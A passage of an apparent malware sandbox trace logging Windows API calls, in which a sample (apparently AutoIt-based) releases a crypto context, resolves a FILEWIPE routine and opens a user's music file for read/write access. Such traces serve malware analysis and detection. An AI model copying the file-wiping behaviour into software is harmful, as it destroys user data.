wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.964] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.964] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.964] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.964] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.964] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.964] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.964] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.964] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.009] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0185.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.009] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.009] FreeLibrary (hLibModule=0x74f20000) returned 1 [0185.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.010] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.011] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.014] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0185.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.015] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0x90ae18 [0185.015] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.015] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.016] CharLowerBuffW (in: lpsz="byte[57186]", cchLength=0xb | out: lpsz="byte[57186]") returned 0xb [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.018] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0185.018] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.018] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.018] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0185.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.019] FreeLibrary (hLibModule=0x75c90000) returned 1 [0185.019] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.019] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.019] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.019] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0185.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.021] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.022] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.022] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0185.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.022] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0185.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0185.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\apddf3aozrxaheczyap.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd7f78 | out: hHeap=0x8a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.025] RtlAllocateHeap 